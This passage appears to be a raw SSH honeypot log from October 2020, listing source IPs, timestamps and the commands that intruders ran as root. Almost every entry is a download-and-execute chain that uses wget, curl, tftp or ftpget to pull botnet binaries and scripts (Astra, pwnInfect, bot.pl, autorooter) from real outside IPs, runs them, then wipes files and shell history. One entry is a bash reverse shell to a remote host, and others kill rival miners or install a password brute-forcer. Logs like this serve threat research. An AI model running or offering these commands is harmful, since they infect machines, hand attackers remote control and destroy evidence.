rm -rf bot.pl history -c wget 193.239.147.156/sora.mips chmod 777 sora.mips ./sora.mips autorooter.mips wget 193.239.147.156/sora.arm chmod 777 sora.arm ./sora.arm autorooter.arm wget 193.239.147.156/sora.arm5 chmod 777 sora.arm5 ./sora.arm5 autorooter.arm5 wget 193.239.147.156/sora.arm6 chmod 777 sora.arm6 ./sora.arm6 autorooter.arm6 wget 193.239.147.156/sora.arm7 chmod 777 sora.arm7 ./sora.arm7 autorooter.arm7 wget 193.239.147.156/sora.mpsl chmod 777 sora.mpsl ./sora.mpsl autorooter.mpsl From 185.132.53.14 3-Oct-2020 11:42:22 ssh2 root Exec wget http://192.210.214.51/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 roots; rm -rf Astra.x86; history -c wget http://192.210.214.51/bins/Astra.x86 chmod 777 Astra.x86 ./Astra.x86 roots rm -rf Astra.x86 history -c From 104.237.233.111 3-Oct-2020 15:55:28 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://207.182.131.216/cometome; curl -O http://207.182.131.216/cometome; cat cometome > s0531c04t3; chmod +x s0531c04t3; ./s0531c04t3 cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://207.182.131.216/cometome curl -O http://207.182.131.216/cometome cat cometome > s0531c04t3 chmod +x s0531c04t3 ./s0531c04t3 From 46.101.17.38 3-Oct-2020 17:04:53 ssh2 root Exec wget http://192.210.239.115/beastmode/b3astmode.x86; chmod 777 *; ./b3astmode.x86 x86 wget http://192.210.239.115/beastmode/b3astmode.x86 chmod 777 * ./b3astmode.x86 x86 From 188.166.21.137 3-Oct-2020 17:31:53 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://scan.hellp0pp1n.xyz/xZTYFDBXVSDVS456/HashtagFreeInternet.x86; cat HashtagFreeInternet.x86 > as0f5wq1dv0sw514qwd; chmod +x as0f5wq1dv0sw514qwd; ./as0f5wq1dv0sw514qwd Rooted.VPS; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://scan.hellp0pp1n.xyz/xZTYFDBXVSDVS456/HashtagFreeInternet.x86 cat HashtagFreeInternet.x86 > as0f5wq1dv0sw514qwd chmod +x as0f5wq1dv0sw514qwd ./as0f5wq1dv0sw514qwd Rooted.VPS history -c From 167.172.25.74 3-Oct-2020 18:12:46 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://194.15.36.34/dayum0x1a5sfd15as1fa.sh; cat dayum0x1a5sfd15as1fa.sh > josdf99exx0; chmod +x josdf99exx0; ./josdf99exx0; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://194.15.36.34/dayum0x1a5sfd15as1fa.sh cat dayum0x1a5sfd15as1fa.sh > josdf99exx0 chmod +x josdf99exx0 ./josdf99exx0 history -c From 45.148.10.186 4-Oct-2020 04:49:58 ssh2 root Exec nc 1 1;cd /tmp; wget http://45.148.10.186/lolerr; wget http://199.195.254.38/config.json; curl -O http://45.148.10.186/lolerr; curl -O http://199.195.254.38/config.json; busybox wget http://199.195.254.38/config.json; busybox wget http://45.148.10.186/lolerr; chmod 777 *; ./lolerr; rm -rf *; rm config.json; history -c; pkill xmrig; pkill xmra64; pkill a; echo wedonehereboiz-allwgetz; nc 1 1 cd /tmp wget http://45.148.10.186/lolerr wget http://199.195.254.38/config.json curl -O http://45.148.10.186/lolerr curl -O http://199.195.254.38/config.json busybox wget http://199.195.254.38/config.json busybox wget http://45.148.10.186/lolerr chmod 777 * ./lolerr rm -rf * rm config.json history -c pkill xmrig pkill xmra64 pkill a echo wedonehereboiz-allwgetz From 37.46.150.211 4-Oct-2020 06:55:02 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://192.129.175.148/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 192.129.175.148 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 192.129.175.148; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 192.129.175.148 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://192.129.175.148/bins.sh chmod 777 bins.sh sh bins.sh tftp 192.129.175.148 -c get tftp1.sh chmod 777 tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g 192.129.175.148 chmod 777 tftp2.sh sh tftp2.sh ftpget -v -u anonymous -p anonymous -P 21 192.129.175.148 ftp1.sh ftp1.sh sh ftp1.sh rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh rm -rf * From 45.84.196.60 4-Oct-2020 12:48:05 ssh2 root Exec wget http://192.210.214.51/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 roots; rm -rf Astra.* ; history -c wget http://192.210.214.51/bins/Astra.x86 chmod 777 Astra.x86 ./Astra.x86 roots rm -rf Astra.* history -c From 104.131.60.112 4-Oct-2020 23:59:07 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://67.205.165.251/dayum0x1a5sfd15as1fa.sh; cat dayum0x1a5sfd15as1fa.sh > josdf99exx0; chmod +x josdf99exx0; ./josdf99exx0; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://67.205.165.251/dayum0x1a5sfd15as1fa.sh cat dayum0x1a5sfd15as1fa.sh > josdf99exx0 chmod +x josdf99exx0 ./josdf99exx0 history -c From 193.228.91.123 5-Oct-2020 04:32:17 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.49.230.199/pwnInfect.sh; curl -O http://37.49.230.199/pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp 37.49.230.199 -c get pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp -r pwnInfect2.sh -g 37.49.230.199; chmod 777 pwnInfect2.sh; sh pwnInfect2.sh; ftpget -v -u anonymous -p anonymous -P 21 37.49.230.199 pwnInfect1.sh pwnInfect1.sh; sh pwnInfect1.sh; rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://37.49.230.199/pwnInfect.sh curl -O http://37.49.230.199/pwnInfect.sh chmod 777 pwnInfect.sh sh pwnInfect.sh tftp 37.49.230.199 -c get pwnInfect.sh chmod 777 pwnInfect.sh sh pwnInfect.sh tftp -r pwnInfect2.sh -g 37.49.230.199 chmod 777 pwnInfect2.sh sh pwnInfect2.sh ftpget -v -u anonymous -p anonymous -P 21 37.49.230.199 pwnInfect1.sh pwnInfect1.sh sh pwnInfect1.sh rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh rm -rf * From 194.180.224.115 5-Oct-2020 07:32:24 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.49.230.199/pipe.sh; curl -O http://37.49.230.199/pipe.sh; chmod 777 pipe.sh; sh pipe.sh; rm -rf pipe.sh pipe.sh; rm -rf * cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://37.49.230.199/pipe.sh curl -O http://37.49.230.199/pipe.sh chmod 777 pipe.sh sh pipe.sh rm -rf pipe.sh pipe.sh rm -rf * From 37.46.150.211 5-Oct-2020 08:50:31 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.239.242.200/skid.sh; chmod 777 skid.sh; sh skid.sh; tftp 185.239.242.200 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 185.239.242.200; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://185.239.242.200/skid.sh chmod 777 skid.sh sh skid.sh tftp 185.239.242.200 -c get tftp1.sh chmod 777 tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g 185.239.242.200 chmod 777 tftp2.sh sh tftp2.sh rm -rf * From 51.116.116.232 5-Oct-2020 17:47:22 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://212.73.150.134/NoHomobins.sh; chmod 777 NoHomobins.sh; sh NoHomobins.sh; tftp 212.73.150.134 -c get NoHomotftp1.sh; chmod 777 NoHomotftp1.sh; sh NoHomotftp1.sh; tftp -r NoHomotftp2.sh -g 212.73.150.134; chmod 777 NoHomotftp2.sh; sh NoHomotftp2.sh; rm -rf NoHomobins.sh NoHomotftp1.sh NoHomotftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://212.73.150.134/NoHomobins.sh chmod 777 NoHomobins.sh sh NoHomobins.sh tftp 212.73.150.134 -c get NoHomotftp1.sh chmod 777 NoHomotftp1.sh sh NoHomotftp1.sh tftp -r NoHomotftp2.sh -g 212.73.150.134 chmod 777 NoHomotftp2.sh sh NoHomotftp2.sh rm -rf NoHomobins.sh NoHomotftp1.sh NoHomotftp2.sh rm -rf * From 193.228.91.11 5-Oct-2020 19:23:21 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.109/uDvrLib.sh; curl -O http://193.228.91.109/uDvrLib.sh; chmod 777 uDvrLib.sh; sh uDvrLib.sh; tftp 193.228.91.109 -c get v14tftp.sh; chmod 777 v14tftp.sh; sh v14tftp.sh; tftp -r v13tftp.sh -g 193.228.91.109; chmod 777 v13tftp.sh; sh v13tftp.sh; rm -rf uDvrLib.sh v14tftp.sh v13tftp.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://193.228.91.109/uDvrLib.sh curl -O http://193.228.91.109/uDvrLib.sh chmod 777 uDvrLib.sh sh uDvrLib.sh tftp 193.228.91.109 -c get v14tftp.sh chmod 777 v14tftp.sh sh v14tftp.sh tftp -r v13tftp.sh -g 193.228.91.109 chmod 777 v13tftp.sh sh v13tftp.sh rm -rf uDvrLib.sh v14tftp.sh v13tftp.sh rm -rf * From 45.148.10.15 5-Oct-2020 23:56:00 ssh2 root Exec grep 'cpu cores' /proc/cpuinfo | uniq grep 'cpu cores' /proc/cpuinfo | uniq Exec echo -e "\x6F\x6B" echo -e "\x6F\x6B" From 185.132.53.115 6-Oct-2020 04:46:47 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://23.254.128.159/Thorbins.sh; chmod 777 Thorbins.sh; sh Thorbins.sh; tftp 23.254.128.159 -c get Thortftp1.sh; chmod 777 Thortftp1.sh; sh Thortftp1.sh; tftp -r Thortftp2.sh -g 23.254.128.159; chmod 777 Thortftp2.sh; sh Thortftp2.sh; rm -rf Thorbins.sh Thortftp1.sh Thortftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://23.254.128.159/Thorbins.sh chmod 777 Thorbins.sh sh Thorbins.sh tftp 23.254.128.159 -c get Thortftp1.sh chmod 777 Thortftp1.sh sh Thortftp1.sh tftp -r Thortftp2.sh -g 23.254.128.159 chmod 777 Thortftp2.sh sh Thortftp2.sh rm -rf Thorbins.sh Thortftp1.sh Thortftp2.sh rm -rf * From 34.65.118.201 7-Oct-2020 07:28:41 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.145.185.13/sensi.sh; curl -O http://45.145.185.13/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 45.145.185.13 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 45.145.185.13; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.145.185.13 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *; wget 45.145.185.13/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; curl -O 45.145.185.13/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://45.145.185.13/sensi.sh curl -O http://45.145.185.13/sensi.sh chmod 777 sensi.sh sh sensi.sh tftp 45.145.185.13 -c get sensi.sh chmod 777 sensi.sh sh sensi.sh tftp -r sensi2.sh -g 45.145.185.13 chmod 777 sensi2.sh sh sensi2.sh ftpget -v -u anonymous -p anonymous -P 21 45.145.185.13 sensi1.sh sensi1.sh sh sensi1.sh rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh rm -rf * wget 45.145.185.13/bot.pl perl bot.pl rm -rf bot.pl history -c curl -O 45.145.185.13/bot.pl perl bot.pl rm -rf bot.pl history -c From 5.45.82.247 7-Oct-2020 10:15:33 ssh2 root apt-get update help From 58.221.204.114 7-Oct-2020 10:16:47 ssh2 root ls Exec cat /proc/cpuinfo | grep name | wc -l cat /proc/cpuinfo | grep name | wc -l cd mail ls nano lan.doc help h -h sudo su cd cd ls test.pl cd vmware ls From 159.203.78.201 7-Oct-2020 10:32:09 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://185.132.53.225/dayum0x1a5sfd15as1fa.sh; cat dayum0x1a5sfd15as1fa.sh > sssoggrf; chmod +x sssoggrf; ./sssoggrf; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://185.132.53.225/dayum0x1a5sfd15as1fa.sh cat dayum0x1a5sfd15as1fa.sh > sssoggrf chmod +x sssoggrf ./sssoggrf history -c From 45.138.72.100 8-Oct-2020 02:01:01 ssh2 root Exec ls -la1 ls -la1 From 35.239.98.160 8-Oct-2020 11:33:37 ssh2 root Exec cat /etc/issue ; cd /tmp ; wget 45.145.185.13/vcimanagement.x86 ; chmod 777 vcimanagement.x86 ; ./vcimanagement.x86 autorooter.x86 rm -rf vcimanagement* ; curl -O wget 45.145.185.13/vcimanagement.x86 ; chmod 777 vcimanagement.x86 ; ./vcimanagement.x86 autorooter.x86 ; rm -rf vcimanagement* ; wget 45.145.185.13/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; curl -O 45.145.185.13/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c cat /etc/issue cd /tmp wget 45.145.185.13/vcimanagement.x86 chmod 777 vcimanagement.x86 ./vcimanagement.x86 autorooter.x86 rm -rf vcimanagement* curl -O wget 45.145.185.13/vcimanagement.x86 chmod 777 vcimanagement.x86 ./vcimanagement.x86 autorooter.x86 rm -rf vcimanagement* wget 45.145.185.13/bot.pl perl bot.pl rm -rf bot.pl history -c curl -O 45.145.185.13/bot.pl perl bot.pl rm -rf bot.pl history -c From 193.228.91.123 8-Oct-2020 12:12:06 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.95.168.132/pwnInfect.sh; curl -O http://45.95.168.132/pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp 45.95.168.132 -c get pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp -r pwnInfect2.sh -g 45.95.168.132; chmod 777 pwnInfect2.sh; sh pwnInfect2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.95.168.132 pwnInfect1.sh pwnInfect1.sh; sh pwnInfect1.sh; rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://45.95.168.132/pwnInfect.sh curl -O http://45.95.168.132/pwnInfect.sh chmod 777 pwnInfect.sh sh pwnInfect.sh tftp 45.95.168.132 -c get pwnInfect.sh chmod 777 pwnInfect.sh sh pwnInfect.sh tftp -r pwnInfect2.sh -g 45.95.168.132 chmod 777 pwnInfect2.sh sh pwnInfect2.sh ftpget -v -u anonymous -p anonymous -P 21 45.95.168.132 pwnInfect1.sh pwnInfect1.sh sh pwnInfect1.sh rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh rm -rf * From 194.180.224.130 8-Oct-2020 12:39:19 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root cd /; wget http://45.145.185.94/uDvrLib.sh; curl -O http://45.145.185.94/uDvrLib.sh; chmod 777 uDvrLib.sh; sh uDvrLib.sh; tftp 45.145.185.94 -c get v14tftp.sh; chmod 777 v14tftp.sh; sh v14tftp.sh; tftp -r v13tftp.sh -g 45.145.185.94; chmod 777 v13tftp.sh; sh v13tftp.sh; ftpget -v -u anonymous -p anonymous -P 21 45.145.185.94 v12ftp.sh v12ftp.sh; sh v12ftp.sh; rm -rf uDvrLib.sh v14tftp.sh v13tftp.sh v12ftp.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root cd / wget http://45.145.185.94/uDvrLib.sh curl -O http://45.145.185.94/uDvrLib.sh chmod 777 uDvrLib.sh sh uDvrLib.sh tftp 45.145.185.94 -c get v14tftp.sh chmod 777 v14tftp.sh sh v14tftp.sh tftp -r v13tftp.sh -g 45.145.185.94 chmod 777 v13tftp.sh sh v13tftp.sh ftpget -v -u anonymous -p anonymous -P 21 45.145.185.94 v12ftp.sh v12ftp.sh sh v12ftp.sh rm -rf uDvrLib.sh v14tftp.sh v13tftp.sh v12ftp.sh rm -rf * From 185.132.53.14 8-Oct-2020 19:08:52 ssh2 root Exec wget http://194.87.138.211/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 roots; rm -rf Astra.* ; history -c wget http://194.87.138.211/bins/Astra.x86 chmod 777 Astra.x86 ./Astra.x86 roots rm -rf Astra.* history -c From 194.180.224.130 9-Oct-2020 11:00:11 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root cd /; wget http://193.228.91.109/uDvrLib.sh; curl -O http://193.228.91.109/uDvrLib.sh; chmod 777 uDvrLib.sh; sh uDvrLib.sh; tftp 193.228.91.109 -c get v14tftp.sh; chmod 777 v14tftp.sh; sh v14tftp.sh; tftp -r v13tftp.sh -g 193.228.91.109; chmod 777 v13tftp.sh; sh v13tftp.sh; ftpget -v -u anonymous -p anonymous -P 21 193.228.91.109 v12ftp.sh v12ftp.sh; sh v12ftp.sh; rm -rf uDvrLib.sh v14tftp.sh v13tftp.sh v12ftp.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root cd / wget http://193.228.91.109/uDvrLib.sh curl -O http://193.228.91.109/uDvrLib.sh chmod 777 uDvrLib.sh sh uDvrLib.sh tftp 193.228.91.109 -c get v14tftp.sh chmod 777 v14tftp.sh sh v14tftp.sh tftp -r v13tftp.sh -g 193.228.91.109 chmod 777 v13tftp.sh sh v13tftp.sh ftpget -v -u anonymous -p anonymous -P 21 193.228.91.109 v12ftp.sh v12ftp.sh sh v12ftp.sh rm -rf uDvrLib.sh v14tftp.sh v13tftp.sh v12ftp.sh rm -rf * From 193.228.91.123 10-Oct-2020 03:28:26 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.115/hentai.sh; curl -O http://194.180.224.115/hentai.sh; chmod 777 hentai.sh; sh hentai.sh; tftp 194.180.224.115 -c get hentai.sh; chmod 777 hentai.sh; sh hentai.sh; tftp -r hentai2.sh -g 194.180.224.115; chmod 777 hentai2.sh; sh hentai2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.180.224.115 hentai1.sh hentai1.sh; sh hentai1.sh; rm -rf hentai.sh hentai.sh hentai2.sh hentai1.sh; rm -rf * cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://194.180.224.115/hentai.sh curl -O http://194.180.224.115/hentai.sh chmod 777 hentai.sh sh hentai.sh tftp 194.180.224.115 -c get hentai.sh chmod 777 hentai.sh sh hentai.sh tftp -r hentai2.sh -g 194.180.224.115 chmod 777 hentai2.sh sh hentai2.sh ftpget -v -u anonymous -p anonymous -P 21 194.180.224.115 hentai1.sh hentai1.sh sh hentai1.sh rm -rf hentai.sh hentai.sh hentai2.sh hentai1.sh rm -rf * From 159.89.104.95 10-Oct-2020 12:34:36 ssh2 root Exec wget http://185.132.53.14/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 roots; rm -rf Astra.* ; history -c wget http://185.132.53.14/bins/Astra.x86 chmod 777 Astra.x86 ./Astra.x86 roots rm -rf Astra.* history -c From 65.19.174.198 11-Oct-2020 07:06:06 ssh2 root Exec w ; nproc ; uname -a w nproc uname -a Exec cat /proc/cpuinfo | grep name | wc -l cat /proc/cpuinfo | grep name | wc -l From 65.19.174.198 11-Oct-2020 07:07:54 ssh2 root Exec w ; nproc ; uname -a w nproc uname -a From 193.228.91.123 12-Oct-2020 08:24:40 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.115/hentai.sh; curl -O http://194.180.224.115/hentai.sh; chmod 777 hentai.sh; sh hentai.sh; rm -rf hentai.sh hentai.sh ; rm -rf * cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://194.180.224.115/hentai.sh curl -O http://194.180.224.115/hentai.sh chmod 777 hentai.sh sh hentai.sh rm -rf hentai.sh hentai.sh rm -rf * From 5.14.17.52 12-Oct-2020 10:04:49 ssh2 root w lscpu cd /usr/lib ls -a cd w pwd ls -a cd /usr/lib/updated ls -a dir ls -a halt From 35.238.6.69 12-Oct-2020 15:03:45 ssh2 root Exec cat /etc/issue ; rm -rf bot* ; wget 35.222.198.210/bot.pl ; perl bot.pl ; curl -O 35.222.198.210/bot.pl ; perl bot.pl ; rm -rf bot* ; history -c cat /etc/issue rm -rf bot* wget 35.222.198.210/bot.pl perl bot.pl curl -O 35.222.198.210/bot.pl perl bot.pl rm -rf bot* history -c From 51.254.111.244 13-Oct-2020 08:50:03 ssh2 root Exec uname -a ; uname -a From 193.228.91.123 13-Oct-2020 21:31:39 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.115/hentai.sh; curl -O http://194.180.224.115/hentai.sh; chmod 777 hentai.sh; sh hentai.sh; rm -rf hentai.sh hentai.sh ;cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.123/pwnInfect.sh; curl -O http://193.228.91.123/pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp 193.228.91.123 -c get pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp -r pwnInfect2.sh -g 193.228.91.123; chmod 777 pwnInfect2.sh; sh pwnInfect2.sh; ftpget -v -u anonymous -p anonymous -P 21 193.228.91.123 pwnInfect1.sh pwnInfect1.sh; sh pwnInfect1.sh; rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh; rm -rf * cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://194.180.224.115/hentai.sh curl -O http://194.180.224.115/hentai.sh chmod 777 hentai.sh sh hentai.sh rm -rf hentai.sh hentai.sh cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://193.228.91.123/pwnInfect.sh curl -O http://193.228.91.123/pwnInfect.sh chmod 777 pwnInfect.sh sh pwnInfect.sh tftp 193.228.91.123 -c get pwnInfect.sh chmod 777 pwnInfect.sh sh pwnInfect.sh tftp -r pwnInfect2.sh -g 193.228.91.123 chmod 777 pwnInfect2.sh sh pwnInfect2.sh ftpget -v -u anonymous -p anonymous -P 21 193.228.91.123 pwnInfect1.sh pwnInfect1.sh sh pwnInfect1.sh rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh rm -rf * From 37.49.225.250 14-Oct-2020 04:55:23 ssh2 root Exec cd /tmp; wget http://107.173.122.103/x86; chmod 777 x86; ./x86 Rooted; rm -rf * cd /tmp wget http://107.173.122.103/x86 chmod 777 x86 ./x86 Rooted rm -rf * From 23.95.186.183 14-Oct-2020 21:55:29 ssh2 root Exec cd /tmp; wget http://194.87.138.97/bins/hoho.x86; chmod 777 *; ./hoho.x86 gift from Magisk#6297 cd /tmp wget http://194.87.138.97/bins/hoho.x86 chmod 777 * ./hoho.x86 gift from Magisk#6297 From 125.212.233.74 15-Oct-2020 09:14:51 ssh2 root Exec cat /etc/issue ; yum install wget -y ; apt install wget -y ; wget 35.238.142.2/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 35.238.142.2/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c cat /etc/issue yum install wget -y apt install wget -y wget 35.238.142.2/bot.pl perl bot.pl rm -rf bot.pl curl -O 35.238.142.2/bot.pl perl bot.pl rm -rf bot.pl history -c From 209.141.51.59 15-Oct-2020 15:03:35 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.124.40/SnOoPy.sh; chmod 777 *; sh SnOoPy.sh; tftp -g 205.185.124.40 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://205.185.124.40/SnOoPy.sh chmod 777 * sh SnOoPy.sh tftp -g 205.185.124.40 -r tftp1.sh chmod 777 * sh tftp1.sh rm -rf *.sh history -c From 94.26.126.107 15-Oct-2020 21:01:18 ssh2 root ls w free -g yum install hydra -y apt-get install hydra From 193.105.134.45 15-Oct-2020 21:02:00 ssh2 root apt-get update curl -O http://130.0.164.120/scan.jpg From 159.192.32.4 16-Oct-2020 01:01:57 ssh2 root Exec scp -r -t ~ scp -r -t ~ From 2.57.122.186 16-Oct-2020 05:28:38 ssh2 root Exec nc 1 1; rm s.sh; wget http://45.148.10.186/s.sh; busybox wget http://45.148.10.186/s.sh; curl -O http://45.148.10.186/s.sh; chmod 777 *; sh s.sh; cat /etc/issue nc 1 1 rm s.sh wget http://45.148.10.186/s.sh busybox wget http://45.148.10.186/s.sh curl -O http://45.148.10.186/s.sh chmod 777 * sh s.sh cat /etc/issue From 51.77.56.9 17-Oct-2020 03:10:18 ssh2 root Exec uname -a uname -a Exec ping 8.8.8.8 ping 8.8.8.8 From 142.11.213.180 17-Oct-2020 03:52:28 ssh2 root Exec bash -i >& /dev/tcp/142.11.213.180/18244 0>&1 bash -i > /dev/tcp/142.11.213.180/18244 0> 1 From 142.11.213.180 17-Oct-2020 04:55:06 ssh2 root pwd ll /u bin ls /usr/bin ls /bin ls ls / uname -a id exit From 142.11.213.180 17-Oct-2020 04:58:21 ssh2 root Exec scp -t /root scp -t /root From 185.239.242.89 17-Oct-2020 15:46:50 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://185.239.242.81/Vividbins.sh; chmod 777 Vividbins.sh; sh Vividbins.sh; tftp 185.239.242.81 -c get Vividtftp1.sh; chmod 777 Vividtftp1.sh; sh Vividtftp1.sh; tftp -r Vividtftp2.sh -g 185.239.242.81; chmod 777 Vividtftp2.sh; sh Vividtftp2.sh; rm -rf Vividbins.sh Vividtftp1.sh Vividtftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://185.239.242.81/Vividbins.sh chmod 777 Vividbins.sh sh Vividbins.sh tftp 185.239.242.81 -c get Vividtftp1.sh chmod 777 Vividtftp1.sh sh Vividtftp1.sh tftp -r Vividtftp2.sh -g 185.239.242.81 chmod 777 Vividtftp2.sh sh Vividtftp2.sh rm -rf Vividbins.sh Vividtftp1.sh Vividtftp2.sh rm -rf * From 159.65.114.69 18-Oct-2020 04:16:32 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://185.132.53.124/Thorbins.sh; chmod 777 Thorbins.sh; sh Thorbins.sh; tftp 185.132.53.124 -c get Thortftp1.sh; chmod 777 Thortftp1.sh; sh Thortftp1.sh; tftp -r Thortftp2.sh -g 185.132.53.124; chmod 777 Thortftp2.sh; sh Thortftp2.sh; rm -rf Thorbins.sh Thortftp1.sh Thortftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://185.132.53.124/Thorbins.sh chmod 777 Thorbins.sh sh Thorbins.sh tftp 185.132.53.124 -c get Thortftp1.sh chmod 777 Thortftp1.sh sh Thortftp1.sh tftp -r Thortftp2.sh -g 185.132.53.124 chmod 777 Thortftp2.sh sh Thortftp2.sh rm -rf Thorbins.sh Thortftp1.sh Thortftp2.sh rm -rf * From 193.228.91.110 18-Oct-2020 19:18:20 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.109/Otpzl/7rtya.x86; curl -O http://193.228.91.109/Otpzl/7rtya.x86; chmod +x 7rtya.x86; ./7rtya.x86 Exploit.x86; rm -rf 7rtya.x86.x86; tftp 193.228.91.109 -c get 7rtya.x86; chmod +x 7rtya.x86; ./7rtya.x86 TFTP.Exploit.x86;rm -rf 7rtya.x86; history -c cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://193.228.91.109/Otpzl/7rtya.x86 curl -O http://193.228.91.109/Otpzl/7rtya.x86 chmod +x 7rtya.x86 ./7rtya.x86 Exploit.x86 rm -rf 7rtya.x86.x86 tftp 193.228.91.109 -c get 7rtya.x86 chmod +x 7rtya.x86 ./7rtya.x86 TFTP.Exploit.x86 rm -rf 7rtya.x86 history -c From 193.228.91.123 18-Oct-2020 21:49:19 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.123/pwnInfect.sh; curl -O http://193.228.91.123/pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp 193.228.91.123 -c get pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp -r pwnInfect2.sh 